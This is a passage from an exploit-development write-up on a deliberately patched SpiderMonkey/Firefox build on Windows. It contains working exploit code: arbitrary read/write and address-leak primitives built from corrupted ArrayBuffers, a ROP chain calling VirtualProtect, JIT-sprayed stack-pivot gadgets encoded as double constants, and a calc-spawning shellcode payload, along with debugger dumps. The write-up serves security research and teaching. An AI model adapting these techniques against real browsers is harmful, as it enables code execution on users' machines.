00007ff7`81e3d0b0  00007fff`b6481cb0 KERNEL32!WaitForSingleObjectEx
00007ff7`81e3d0b8  00007fff`b6461010 KERNEL32!RtlVirtualUnwindStub
00007ff7`81e3d0c0  00007fff`b647e640 KERNEL32!SetUnhandledExceptionFilterStub
00007ff7`81e3d0c8  00007fff`b647c750 KERNEL32!IsProcessorFeaturePresentStub
00007ff7`81e3d0d0  00007fff`b8c038b0 ntdll!RtlInitializeSListHead

As kernel32!InitializeSListHead is a forward-exports to ntdll!RtlInitializeSListHead we can just go and read at js+0190d0d0 to get an address inside ntdll. From there, we can subtract (another..) hardcoded offset to get the base and voilà.

Executing arbitrary native code execution

At this point we can execute a ROP payload of arbitrary size and we want it to dispatch execution to an arbitrary native code payload of our choice. This is pretty easy, standard, and mechanical. We call VirtualProtect to make a TypedArray buffer (the one holding the native payload) executable. And then, kindly branches execution there.

Here is the chain used in basic.js:

const PAGE_EXECUTE_READWRITE = new Int64(0x40);
const BigRopChain = [
    // 0x1400cc4ec: pop rcx ; ret  ;  (43 found)
    Add(JSBase, 0xcc4ec),
    ShellcodeAddress,

    // 0x1400731da: pop rdx ; ret  ;  (20 found)
    Add(JSBase, 0x731da),
    new Int64(Shellcode.length),

    // 0x14056c302: pop r8 ; ret  ;  (8 found)
    Add(JSBase, 0x56c302),
    PAGE_EXECUTE_READWRITE,

    VirtualProtect,
    // 0x1413f1d09: add rsp, 0x10 ; pop r14 ; pop r12 ; pop rbp ; ret  ;  (1 found)
    Add(JSBase, 0x13f1d09),
    new Int64('0x1111111111111111'),
    new Int64('0x2222222222222222'),
    new Int64('0x3333333333333333'),
    new Int64('0x4444444444444444'),
    ShellcodeAddress,

    // 0x1400e26fd: jmp rbp ;  (30 found)
    Add(JSBase, 0xe26fd)
];

Instead of coding up my own payload or re-using one on the Internet I figured I would give a shot to Binary Ninja's ShellCode Compiler. The idea is pretty simple, it allows you to write position-independent payloads in a higher level language than machine code. You can use a subset of C to write it, and then compile it down to the architecture you want.

void main() {
    STARTUPINFOA Si;
    PROCESS_INFORMATION Pi;
    memset(&Si, 0, sizeof(Si));
    Si.cb = sizeof(Si);
    CreateProcessA(
        NULL,
        "calc",
        NULL,
        NULL,
        false,
        0,
        NULL,
        NULL,
        &Si,
        &Pi
    );
    ExitProcess(1337);
}

I have compiled the above with scc.exe --arch x64 --platform windows scc-payload.cc and tada. After trying it out, I quickly noticed that the payload would crash when creating the calculator process. I thought I had messed something up and as a result started to debug it. In the end, turns out scc's code generation had a bug and would not ensure that the stack pointer was 16 bytes aligned. This is an issue because a bunch of SSE instructions accessing memory require dest / source locations 16-bytes aligned. After reaching out to the Vector35 guys with a description of the problem, they fixed it extremely fast (even before I had written up a small repro; < 24 hours) in the dev channel which was pretty amazing.

The exploit is now working :). The full source-code is available here: basic.js.

basic.js

Evaluation

I guess we have finally made it. I have actually rewritten this exploit at least three times to make it less and less convoluted and easier. It sure was not necessary and it would have been easy to stop earlier and call it a day. I would really encourage you try to push yourself to both improve and iterate on it as much as you can. Every time I tweaked the exploit or rewrote part of it I have learned new things, perfected others, and became more and more in control. Overall no time wasted as far as I am concerned :).

Once the excitement and joy calms down (might require you to pop a hundred calculators which is totally fine :)), it is always a good thing to take a hard look at what we have accomplished and the things we could / should improve.

Here is the list of my disappointments:

  • Hardcoded offsets. I don't want any. It should be pretty easy to resolve everything we need at runtime. It should not even be hard; it just requires us to write more code.
  • The stack pivot we found earlier is not great. It is specific to a specific build of ntdll as mentioned above and even if we are able to find it in memory at runtime, we have no guarantee that, tomorrow, it will still exist which would break us. So it might be a good idea to move away from it sooner than later.
  • Having this double pivot is also not that great. It is a bit messy in the code, and sounds like a problem we can probably solve without too much effort if we are planning to rethink the stack pivot anyway.
  • With our current exploit, making the JavaScript shell continues execution does not sound easy. The pivot clobbers a bunch of registers and it is not necessarily clear how many of them we could fix.

kaizen.js

As you might have guessed, kaizen was the answer to some of the above points. First, we will get rid of hardcoded offsets and resolve everything we need at runtime. We want it to be able to work on, let's say, another js.exe binary. To pull this off, a bunch of utilities parsing PE structures and scanning memory were developed. No rocket science.

The next big thing is to get rid of the ntdll dependency we have for the stack-pivot. For that, I decided I would explore a bit Spidermonkey's JIT engines. History has shown that JIT engines can turn very useful for an attacker. Maybe we will find a way to have it to something nice for us, maybe not :)

That was the rough initial plan I had. There was one thing I did not realize prior to executing it though.

After coding the various PE utilities and starting use them, I started to observe my exploit crashing a bunch. Ugh, not fun :(. It really felt like it was coming from the memory access primitives that we built earlier. They were working great for the first exploit, but at the same time we only read a handful of things. Whereas, now they definitely are more solicited. Here is one of the crashes I got:

(4b9c.3abc): Break instruction exception - code 80000003 (!!! second chance !!!)
js!JS::Value::toObject+0xc0:
00007ff7`645380a0 b911030000      mov     ecx,311h

0:000> kc
 # Call Site
00 js!JS::Value::toObject
01 js!js::DispatchTyped<js::TenuringTraversalFunctor<JS::Value>,js::TenuringTracer *>
02 js!js::TenuringTracer::traverse
03 js!js::TenuringTracer::traceSlots
04 js!js::TenuringTracer::traceObject
05 js!js::Nursery::collectToFixedPoint
06 js!js::Nursery::doCollection
07 js!js::Nursery::collect
08 js!js::gc::GCRuntime::minorGC
09 js!js::gc::GCRuntime::tryNewNurseryObject<1>
0a js!js::Allocate<JSObject,1>
0b js!js::ArrayObject::createArrayInternal
0c js!js::ArrayObject::createArray
0d js!NewArray<4294967295>
0e js!NewArrayTryUseGroup<4294967295>
0f js!js::jit::NewArrayWithGroup
10 0x0

Two things I forgot: the Nursery is made for storing short-lived objects and it does not have infinite space. For example, when it gets full, the garbage collector is run over the region to try to clean things up. If some of those objects are still alive, they get moved to the Tenured heap. When this happens, it is a bit of a nightmare for us because we lose adjacency between our objects and everything is basically ..derailing. So that is one thing I did not plan initially that we need to fix.

Improving the reliability of the memory access primitives

What I decided to do here is pretty simple: move to new grounds. As soon as I get to read and write memory thanks to the corruption in the Nursery; I use those primitives to corrupt another set of objects that are allocated in the Tenured heap. I chose to corrupt ArrayBuffer objects as they are allocated in the Tenured heap. You can pass an ArrayBuffer to a TypedArray at construction time and the TypedArray gives you a view into the ArrayBuffer's buffer. In other words, we will still be able to read raw bytes in memory and once we redefine our primitives it will be pretty transparent.

class ArrayBufferObject : public ArrayBufferObjectMaybeShared
{
  public:
    static const uint8_t DATA_SLOT = 0;
    static const uint8_t BYTE_LENGTH_SLOT = 1;
    static const uint8_t FIRST_VIEW_SLOT = 2;
    static const uint8_t FLAGS_SLOT = 3;
// [...]
};

First things first: in order to prepare the ground, we simply create two adjacent ArrayBuffers (which are represented by the js::ArrayBufferObject class). Then, we corrupt their BYTE_LENGTH_SLOT (offset +0x28) to make the buffers bigger. The first one is used to manipulate the other and basically service our memory access requests. Exactly like in basic.js but with ArrayBuffers and not TypedArrays.

//
// Let's move the battlefield to the TenuredHeap
//

const AB1 = new ArrayBuffer(1);
const AB2 = new ArrayBuffer(1);
const AB1Address = Pwn.AddrOf(AB1);
const AB2Address = Pwn.AddrOf(AB2);

Pwn.Write(
    Add(AB1Address, 0x28),
    [0x00, 0x00, 0x01, 0x00, 0x00, 0x80, 0xf8, 0xff]
);

Pwn.Write(
    Add(AB2Address, 0x28),
    [0x00, 0x00, 0x01, 0x00, 0x00, 0x80, 0xf8, 0xff]
);

Once this is done, we redefine the Pwn.__Access function to use the Tenured objects we just created. It works nearly as before but the one different detail is that the address of the backing buffer is right-shifted of 1 bit. If the buffer resides at 0xdeadbeef, the address stored in the DATA_SLOT would be 0xdeadbeef >> 1 = 0x6f56df77.

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`65362ac0 4056            push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe0207`ba5980a0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js!js::ArrayBufferObject 0x207`ba5980a0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000207`ba5b19e8 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`6597d2e8 js::HeapSlot

0:000> dqs 0x207`ba5980a0
00000207`ba5980a0  00000207`ba58a8b0
00000207`ba5980a8  00000207`ba5b19e8
00000207`ba5980b0  00000000`00000000
00000207`ba5980b8  00007ff7`6597d2e8 js!emptyElementsHeader+0x10
00000207`ba5980c0  00000103`dd2cc070 <- DATA_SLOT
00000207`ba5980c8  fff88000`00000001 <- BYTE_LENGTH_SLOT
00000207`ba5980d0  fffa0000`00000000 <- FIRST_VIEW_SLOT
00000207`ba5980d8  fff88000`00000000 <- FLAGS_SLOT
00000207`ba5980e0  fffe4d4d`4d4d4d00 <- our backing buffer

0:000> ? 00000103`dd2cc070 << 1
Evaluate expression: 2232214454496 = 00000207`ba5980e0

A consequence of the above is that you cannot read from an odd address as the last bit gets lost. To workaround it, if we encounter an odd address we read from the byte before and we read an extra byte. Easy.

Pwn.__Access = function (Addr, LengthOrValues) {
    if(typeof Addr == 'string') {
        Addr = new Int64(Addr);
    }

    const IsRead = typeof LengthOrValues == 'number';
    let Length = LengthOrValues;
    if(!IsRead) {
        Length = LengthOrValues.length;
    }

    let OddOffset = 0;
    if(Addr.byteAt(0) & 0x1) {
        Length += 1;
        OddOffset = 1;
    }

    if(AB1.byteLength < Length) {
        throw 'Error';
    }

    //
    // Fix base address
    //

    Addr = RShift1(Addr);
    const Biggie = new Uint8Array(AB1);
    for(const [Idx, Byte] of Addr.bytes().entries()) {
        Biggie[Idx + 0x40] = Byte;
    }

    const View = new Uint8Array(AB2);
    if(IsRead) {
        return View.slice(OddOffset, Length);
    }

    for(const [Idx, Byte] of LengthOrValues.entries()) {
        View[OddOffset + Idx] = Byte;
    }
};

The last primitive to redefine is the AddrOf primitive. For this one I simply used the technique mentioned previously that I have seen used in foxpwn.

As we discussed in the introduction of the article, property values get stored in the associated JSObject. When we define a custom property on an ArrayBuffer its value gets stored in memory pointed by the _slots field (as there is not enough space to store it inline). This means that if we have two contiguous ArrayBuffers, we can leverage the first one to relatively read into the second's slots_ field which gives us the address of the property value. Then, we can simply use our arbitrary read primitive to read the js::Value and strips off a few bits to leak the address of arbitrary objects. Let's assume the below JavaScript code:

js> AB = new ArrayBuffer()
({})

js> AB.doare = 1337
1337

js> objectAddress(AB)
"0000020156E9A080"

And from the debugger this is what we can see:

0:006> dt js::NativeObject 0000020156E9A080
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000201`56eb1a88 Void
   +0x010 slots_           : 0x00000201`57153740 js::HeapSlot
   +0x018 elements_        : 0x00007ff7`b48bd2e8 js::HeapSlot

0:006> dqs 0x00000201`57153740 l1
00000201`57153740  fff88000`00000539 <- 1337

So this is exactly what we are going do: define a custom property on AB2 and relatively read out the js::Value and boom.

Pwn.AddrOf = function (Obj) {

    //
    // Technique from saelo's foxpwn exploit
    //

    AB2.hell_on_earth = Obj;
    const SlotsAddressRaw = new Uint8Array(AB1).slice(48, 48 + 8);
    const SlotsAddress = new Int64(SlotsAddressRaw);
    return Int64.fromJSValue(this.Read(SlotsAddress, 8));
};

kaizen.js

Dynamically resolve exported function addresses

This is really something easy to do but for sure is far from being the most interesting or fun thing to do, I hear you..

The utilities are able to use a user-provided read function, a module base-address, it will walk its IAT and resolve an API address. Nothing fancy, if you are more interested you can read the code in moarutils.js and maybe even reuse it!

Force the JIT of arbitrary gadgets: Bring Your Own Gadgets

All right, all right, all right, finally the interesting part. One nice thing about the baseline JIT is the fact that there is no constant blinding. What this means is that if we can find a way to force the engine to JIT a function with constants under our control we could manufacture in memory the gadgets we need. We would not have to rely on an external module and it would be much easier to craft very custom pieces of assembly that fit our needs. This is what I called Bring Your Own Gadgets in the kaizen exploit. This is nothing new, and I think the appropriate term used in the literature is "JIT code-reuse".

The largest type of constants I could find are doubles and that is what I focused on ultimately (even though I tried a bunch of other things). To generate doubles that have the same representation than an arbitrary (as described above, we actually cannot represent every 8 bytes values) quad-word (8 bytes) we leverage two TypedArrays to view the same data in two different representations:

function b2f(A) {
    if(A.length != 8) {
        throw 'Needs to be an 8 bytes long array';
    }

    const Bytes = new Uint8Array(A);
    const Doubles = new Float64Array(Bytes.buffer);
    return Doubles[0];
}

For example, we start-off by generating a double representing 0xdeadbeefbaadc0de by invoking b2f (bytes to float):

js> b2f([0xde, 0xc0, 0xad, 0xba, 0xef, 0xbe, 0xad, 0xde])
-1.1885958399657559e+148

Let's start simple and create a basic JavaScript function that assigns this constant to a bunch of different variables:

const BringYourOwnGadgets = function () {
    const D = -1.1885958399657559e+148;
    const O = -1.1885958399657559e+148;
    const A = -1.1885958399657559e+148;
    const R = -1.1885958399657559e+148;
    const E = -1.1885958399657559e+148;
};

To hint the engine that this function is hot-code and as a result that it should get JITed to machine code, we invoke it a bunch of times. Everytime you call a function, the engine has profiling-type hooks that are invoked to keep track of hot / cold code (among other things). Anyway, according to my testing, invoking the function twelve times triggers the baseline JIT (you should also know about the magic functions inIon and inJit that are documented here) :

for(let Idx = 0; Idx < 12; Idx++) {
    BringYourOwnGadgets();
}

The C++ object backing a JavaScript function is a JSFunction. Here is what it looks like in the debugger:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`65362ac0 4056            push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe01b8`2ffb0c00
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt JSFunction 01b82ffb0c00
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x000001b8`2ff8c240 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`6597d2e8 js::HeapSlot
   +0x020 nargs_           : 0
   +0x022 flags_           : 0x143
   +0x028 u                : JSFunction::U
   +0x038 atom_            : js::GCPtr<JSAtom *>

0:000> dt -r2 JSFunction::U 01b82ffb0c00+28
   +0x000 native           : JSFunction::U::<unnamed-type-native>
      +0x000 func_            : 0x000001b8`2ff8e040        bool  +1b82ff8e040
      +0x008 extra            : JSFunction::U::<unnamed-type-native>::<unnamed-type-extra>
         +0x000 jitInfo_         : 0x000001b8`2ff93420 JSJitInfo
         +0x000 asmJSFuncIndex_  : 0x000001b8`2ff93420
         +0x000 wasmJitEntry_    : 0x000001b8`2ff93420  -> 0x000003ed`90971bf0 Void

From there we can dump the JSJitInfo associated to our function to get its location in memory:

0:000> dt JSJitInfo 0x000001b8`2ff93420
   +0x000 getter           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 setter           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 method           : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 staticMethod     : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x000 ignoresReturnValueMethod : 0x000003ed`90971bf0     bool  +3ed90971bf0
   +0x008 protoID          : 0x1bf0
   +0x008 inlinableNative  : 0x1bf0 (No matching name)
   +0x00a depth            : 0x9097
   +0x00a nativeOp         : 0x9097
   +0x00c type_            : 0y1101
   +0x00c aliasSet_        : 0y1110
   +0x00c returnType_      : 0y00000011 (0x3)
   +0x00c isInfallible     : 0y0
   +0x00c isMovable        : 0y0
   +0x00c isEliminatable   : 0y0
   +0x00c isAlwaysInSlot   : 0y0
   +0x00c isLazilyCachedInSlot : 0y0
   +0x00c isTypedMethod    : 0y0
   +0x00c slotIndex        : 0y0000000000 (0)

0:000> !address 0x000003ed`90971bf0
Usage:                  <unknown>
Base Address:           000003ed`90950000
End Address:            000003ed`90980000
Region Size:            00000000`00030000 ( 192.000 kB)
Protect:                00000020          PAGE_EXECUTE_READ
Allocation Base:        000003ed`90950000
Allocation Protect:     00000001          PAGE_NOACCESS

Things are looking good: the 0x000001b82ff93420 pointer is pointing into a 192kB region that was allocated as PAGE_NOACCESS but is now both executable and readable.

At this point I mainly observed things as opposed to reading a bunch of code. Even though this was probably easier, I would really like to sit down and understand it a bit more (at least more than I currently do :)) So I started dumping a lot of instructions starting at 0x000003ed90971bf0 and scrolling down with the hope of finding some of our constant into the disassembly. Not the most scientific approach I will give you that, but look what I eventually stumbled found:

0:000> u 000003ed`90971c18 l200
[...]
000003ed`90972578 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`90972582 4c895dc8        mov     qword ptr [rbp-38h],r11
000003ed`90972586 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`90972590 4c895dc0        mov     qword ptr [rbp-40h],r11
000003ed`90972594 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`9097259e 4c895db8        mov     qword ptr [rbp-48h],r11
000003ed`909725a2 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
000003ed`909725ac 4c895db0        mov     qword ptr [rbp-50h],r11
000003ed`909725b0 49bbdec0adbaefbeadde mov r11,0DEADBEEFBAADC0DEh
[...]

Sounds familiar eh? This is the four eight bytes constants we assigned in the JavaScript function we defined above. This is very nice because it means that we can use them to plant and manufacture smallish gadgets (remember we have 8 bytes) in memory (at a position we can find at runtime).

Basically I need two gadgets:

  1. The stack-pivot to do something like xchg rsp, rdx / mov rsp, qword ptr [rsp] / mov rsp, qword [rsp+38h] / ret,
  2. A gadget that pops four quad-words off the stack according to the Microsoft x64 calling convention to be be able to invoke kernel32!VirtualProtect with arbitrary arguments.

The second point is very easy. This sequence of instructions pop rcx / pop rdx / pop r8 / pop r9 / ret take 7 bytes which perfectly fits in a double. Next.

The first one is a bit trickier as the sequence of instructions once assembled take more than a double can fit. It is twelve bytes long. Well that sucks. Now if we think about the way the JIT lays out the instructions and our constants, we can easily have a piece of code that branches onto a second one. Let's say another constant with another eight bytes we can use. You can achieve this easily with two bytes short jmp. It means we have six bytes for useful code, and two bytes to jmp to the next part. With the above constraints I decided to split the sequence in three and have them connected with two jumps. The first instruction xchg rsp, rdx needs three bytes and the second one mov rsp, qword ptr [rsp] needs four. We do not have enough space to have them both on the same constant so we pad the first constant with NOPs and place a short jmp +6 at the end. The third instruction is five bytes long and so again we cannot have the second and the third on the same constant. Again, we pad the second one on its own and branch to the third part with a short jmp +6. The fourth instruction ret is only one byte and as a result we can combine the third and the fourth on the same constant.

After doing this small mental gymnastic we end up with:

const BringYourOwnGadgets = function () {
    const PopRegisters = -6.380930795567661e-228;
    const Pivot0 = 2.4879826032820723e-275;
    const Pivot1 = 2.487982018260472e-275;
    const Pivot2 = -6.910095487116115e-229;
};

And let's make sure things look good in the debugger once the function is JITed:

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe01dc`e19b0680
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt -r2 JSFunction::U 1dc`e19b0680+28
   +0x000 native           : JSFunction::U::<unnamed-type-native>
      +0x000 func_            : 0x000001dc`e198e040        bool  +1dce198e040
      +0x008 extra            : JSFunction::U::<unnamed-type-native>::<unnamed-type-extra>
         +0x000 jitInfo_         : 0x000001dc`e1993258 JSJitInfo
         +0x000 asmJSFuncIndex_  : 0x000001dc`e1993258
         +0x000 wasmJitEntry_    : 0x000001dc`e1993258  -> 0x0000015d`e28a1bf0 Void

0:000> dt JSJitInfo 0x000001dc`e1993258
   +0x000 getter           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 setter           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 method           : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 staticMethod     : 0x0000015d`e28a1bf0     bool  +15de28a1bf0
   +0x000 ignoresReturnValueMethod : 0x0000015d`e28a1bf0     bool  +15de28a1bf0

0:000> u 0x0000015d`e28a1bf0 l200
[...]
0000015d`e28a2569 49bb595a41584159c390 mov r11,90C3594158415A59h
0000015d`e28a2573 4c895dc8        mov     qword ptr [rbp-38h],r11
0000015d`e28a2577 49bb4887e2909090eb06 mov r11,6EB909090E28748h
0000015d`e28a2581 4c895dc0        mov     qword ptr [rbp-40h],r11
0000015d`e28a2585 49bb488b24249090eb06 mov r11,6EB909024248B48h
0000015d`e28a258f 4c895db8        mov     qword ptr [rbp-48h],r11
0000015d`e28a2593 49bb488b642438c39090 mov r11,9090C33824648B48h
0000015d`e28a259d 4c895db0        mov     qword ptr [rbp-50h],r11

Disassembling the gadget that allows us to control the first four arguments of kernel32!VirtualProtect..:

0:000> u 0000015d`e28a2569+2
0000015d`e28a256b 59              pop     rcx
0000015d`e28a256c 5a              pop     rdx
0000015d`e28a256d 4158            pop     r8
0000015d`e28a256f 4159            pop     r9
0000015d`e28a2571 c3              ret

..and now the third-part handcrafted stack-pivot:

0:000> u 0000015d`e28a2577+2
0000015d`e28a2579 4887e2          xchg    rsp,rdx
0000015d`e28a257c 90              nop
0000015d`e28a257d 90              nop
0000015d`e28a257e 90              nop
0000015d`e28a257f eb06            jmp     0000015d`e28a2587

0:000> u 0000015d`e28a2587
0000015d`e28a2587 488b2424        mov     rsp,qword ptr [rsp]
0000015d`e28a258b 90              nop
0000015d`e28a258c 90              nop
0000015d`e28a258d eb06            jmp     0000015d`e28a2595

0:000> u 0000015d`e28a2595
0000015d`e28a2595 488b642438      mov     rsp,qword ptr [rsp+38h]
0000015d`e28a259a c3              ret

Pretty cool uh? To be able to scan for the gadget in memory easily, I even plant an ascii constant I can look for. Once I find it, I know the rest of the gadgets should follow six bytes after.

//
// Bring your own gadgetz boiz!
//

const Magic = '0vercl0k'.split('').map(c => c.charCodeAt(0));
const BringYourOwnGadgets = function () {

    const Magic = 2.1091131882779924e+208;
    const PopRegisters = -6.380930795567661e-228;
    const Pivot0 = 2.4879826032820723e-275;
    const Pivot1 = 2.487982018260472e-275;
    const Pivot2 = -6.910095487116115e-229;
};

//
// Force JITing of the gadgets
//

for(let Idx = 0; Idx < 12; Idx++) {
    BringYourOwnGadgets();
}

//
// Retrieve addresses of the gadgets
//

const BringYourOwnGadgetsAddress = Pwn.AddrOf(BringYourOwnGadgets);
const JsScriptAddress = Pwn.ReadPtr(
    Add(BringYourOwnGadgetsAddress, 0x30)
);

const JittedAddress = Pwn.ReadPtr(JsScriptAddress);
let JitPageStart = alignDownPage(JittedAddress);

//
// Scan the JIT page, pages by pages until finding the magic value. Our
// gadgets follow it.
//

let MagicAddress = 0;
let FoundMagic = false;
for(let PageIdx = 0; PageIdx < 3 && !FoundMagic; PageIdx++) {
    const JitPageContent = Pwn.Read(JitPageStart, 0x1000);
    for(let ContentIdx = 0; ContentIdx < JitPageContent.byteLength; ContentIdx++) {
        const Needle = JitPageContent.subarray(
            ContentIdx, ContentIdx + Magic.length
        );

        if(ArrayCmp(Needle, Magic)) {

            //
            // If we find the magic value, then we compute its address, and we getta outta here!
            //

            MagicAddress = Add(JitPageStart, ContentIdx);
            FoundMagic = true;
            break;
        }
    }

    JitPageStart = Add(JitPageStart, 0x1000);
}

const PopRcxRdxR8R9Address = Add(MagicAddress, 0x8 + 4 + 2);
const RetAddress = Add(PopRcxRdxR8R9Address, 6);
const PivotAddress = Add(PopRcxRdxR8R9Address, 0x8 + 4 + 2);

print('[+] PopRcxRdxR8R9 is @ ' + PopRcxRdxR8R9Address.toString(16));
print('[+] Pivot is @ ' + PivotAddress.toString(16));
print('[+] Ret is @ ' + RetAddress.toString(16));

This takes care of our dependency on the ntdll module, and it also puts us in the right direction for process continuation as we could save-off / restore things easily. Cherry on the cake, the mov rsp, qword ptr [rsp+38h] allow us to pivot directly into the backing buffer of a TypedArray so we do not need to pivot twice anymore. We pivot once to our ROP chain which invokes kernel32!VirtualProtect and dispatches execution to our native payload.

kaizen.js

Evaluation

This was pretty fun to write. A bunch of new challenges, even though I did not really foresee a handful of them. That is also why it is really important to actually do things. It might look easy but you really have to put the efforts in. It keeps your honest. Especially when dealing with such big machineries where you cannot possibly predict everything and as a result unexpected things will happen (it is guaranteed).

At this stage there are three things that I wanted to try to solve and improve:

  • The exploit still does not continue execution. The payload exits after popping the calculator as we would crash on return.
  • It targets the JavaScript shell only. All the efforts we have made to make the exploit much less dependent to this very version of js.exe should help into making the exploit works in Firefox.
  • I enjoyed playing with JIT code-reuse. Even though it is nice I still need to resolve dynamically the address of let's say kernel32!VirtualProtect which is a bit annoying. It is even more annoying because the native payload will do the same job: resolving all its dependencies at runtime. But what if we could let the payload deal with this on its own..? What if we pushed JIT code-reuse to the max, and instead of manufacturing a few gadgets we have our entire native payload incorporated in JITed constants? If we could, process continuation would probably be super trivial to do. The payload should return and it should just work (tm).

ifrit.js

The big chunk of this exploit is the Bring Your Own Payload part. It sounded easy but turned out to be much more annoying than I thought. If we pull it off though, our exploit should be nearly the same than kaizen.js as hijacking control-flow would be the final step.

Compiling a 64 bit version of Firefox on Windows

Before going back to debugging and haxing we need to actually compile ourselves a version of Firefox we can work on.

This was pretty easy and I did not take extensive notes about it, which suggests it all went fine (just do not forget to apply the blaze.patch to get a vulnerable xul.dll module):

$ cp browser/config/mozconfigs/win64/plain-opt mozconfig
$ mach build

If you are not feeling like building Firefox which, clearly I understand, I have uploaded 7z archives with the binaries I built for Windows 64-bit along with private symbol for xul.dll: ff-bin.7z.001 and ff-bin.7z.002.

Configuring Firefox for the development of ifrit

To make things easier, there are a bunch of settings we can turn-on/off to make our lives easier (in about:config):

  1. Disable the sandbox: security.sandbox.content.level=0,
  2. Disable the multi-process mode: browser.tabs.remote.autostart=false,
  3. Disable resume from crash: browser.sessionstore.resume_from_crash=false,
  4. Disable default browser check: browser.shell.checkDefaultBrowser=false.

To debug a specific content process (with the multi-process mode enabled) you can over the mouse to the tab and it should tell you its PID as below:

pid.png

With those settings, it should be trivial to attach to the Firefox instance processing your content.

Force the JIT of an arbitrary native payload: Bring Your Own Payload

The first thing to do is to grab our payload and have a look at it. As we have seen earlier, we know that we can "only" use six bytes out of the eight if we want it to branch to the next constant. Six bytes is pretty luxurious to be honest, but at the same time a bunch of instructions generated by a regular compiler are bigger. As you can see below, there are a handful of those (not that many though):

[...]
000001c1`1b226411 488d056b020000  lea     rax,[000001c1`1b226683]
[...]
000001c1`1b226421 488d056b020000  lea     rax,[000001c1`1b226693]
[...]
000001c1`1b22643e 488d153e020000  lea     rdx,[000001c1`1b226683]
[...]
000001c1`1b2264fb 418b842488000000 mov     eax,dword ptr [r12+88h]
[...]
000001c1`1b22660e 488da42478ffffff lea     rsp,[rsp-88h]
[...]
000001c1`1b226616 488dbd78ffffff  lea     rdi,[rbp-88h]
[...]
000001c1`1b226624 c78578ffffff68000000 mov dword ptr [rbp-88h],68h
[...]
000001c1`1b226638 4c8d9578ffffff  lea     r10,[rbp-88h]
[...]
000001c1`1b22665b 488d0521000000  lea     rax,[000001c1`1b226683]
[...]
000001c1`1b226672 488d150a000000  lea     rdx,[000001c1`1b226683]
[...]

After a while I eventually realized (too late, sigh) that the SCC generated payload assumes the location from which it is going to be run from is both writable and executable. It works fine if you run it on the stack, or in the backing buffer of a TypedArray: like in basic and kaizen. From a JIT page though, it does not and it becomes a problem as it is not writeable for obvious security reasons.

So I dropped the previous payload and started building a new one myself. I coded it up in C in a way that makes it position independent with some handy scripts that my mate yrp shared with me. After hustling around with the compiler and various options I end-up with something that is decent in size and seems to work.

Back at observing this payload closer, the situation looks pretty similar than above: instructions larger than six bytes end-up being a minority. Fortunately. At this point, it was time to leave C land to move to assembly land. I extracted the assembly and started replacing manually all those instructions with smaller semantic-equivalent instructions. That is one of those problems that is not difficult but just very annoying. This is the assembly payload fixed-up if you want to take a look at it.

Eventually, the payload was back at working correctly but this time without instructions bigger than six bytes. We can start to write JavaScript code to iterate through the assembly of the payload and pack as many instructions as possible in a constant. You can pack three instructions of 2 bytes in the same constant, but not one of 4 bytes and one of 3 bytes for example; you get the idea :)

After trying out the resulting payload I unfortunately discovered and realized two major issues:

  • Having "padding" in between every instructions break every type of references in x64 code. rip addressing is broken, relative jumps are broken as well as relative calls. Which is actually... pretty obvious when you think about it.

  • Turns out JITing functions with a large number of constants generates bigger instructions. In the previous examples, we basically have the following pattern repeated: an eight bytes mov r11, constant followed by a four bytes mov qword ptr [rbp-offset], r11. Well, if you start to have a lot of constant in your JavaScript function, eventually the offset gets bigger (as all the doubles sound to be stored on the stack-frame) and the encoding for the mov qword ptr [rbp-offset], r11 instruction gets now encoded with ..seven bytes. The annoying thing is that we get a mix of both those encodings throughout the JITed payload. This is a real nightmare for our payload as we do not know how many bytes to jump forward. If we jump too far, or not far enough, we risk to end up trying to execute the middle of an instruction that probably will lead us to a crash.

000000bf`c2ed9b88 49bb909090909090eb09 mov r11,9EB909090909090h
000000bf`c2ed9b92 4c895db0        mov     qword ptr [rbp-50h],r11 <- small

VS

000000bf`c2ed9bc9 49bb909090909090eb09 mov r11,9EB909090909090h
000000bf`c2ed9bd3 4c899db8f5ffff  mov     qword ptr [rbp-0A48h],r11 <- big

I started by trying to tackle second issue. I figured that if I did not have a satisfactory answer to this issue, I would not be able to have the references fixed-up properly in the payload. To be honest, at this point I was a bit burned out and definitely was dragging my feet at this point. Was it really worth it to make it? Probably, not. But that would mean quitting :(. So I decided to take a small break and come back at it after a week or so. Back at it after a small break, after observing how the baseline JIT behaved I noticed that if I had an even bigger number of constants in this function I could more or less indirectly control how big the offset gets. If I make it big enough, seven bytes is enough to encode very large offsets. So I started injecting a bunch of useless constants to enlarge the stack-frame and have the offsets grow and grow. Eventually, once this offset is "saturated" we get a nice stable layout like in the below:

0:000> u 00000123`c34d67c1 l100
00000123`c34d67c1 49bb909090909090eb09 mov r11,9EB909090909090h
00000123`c34d67cb 4c899db0feffff  mov     qword ptr [rbp-150h],r11
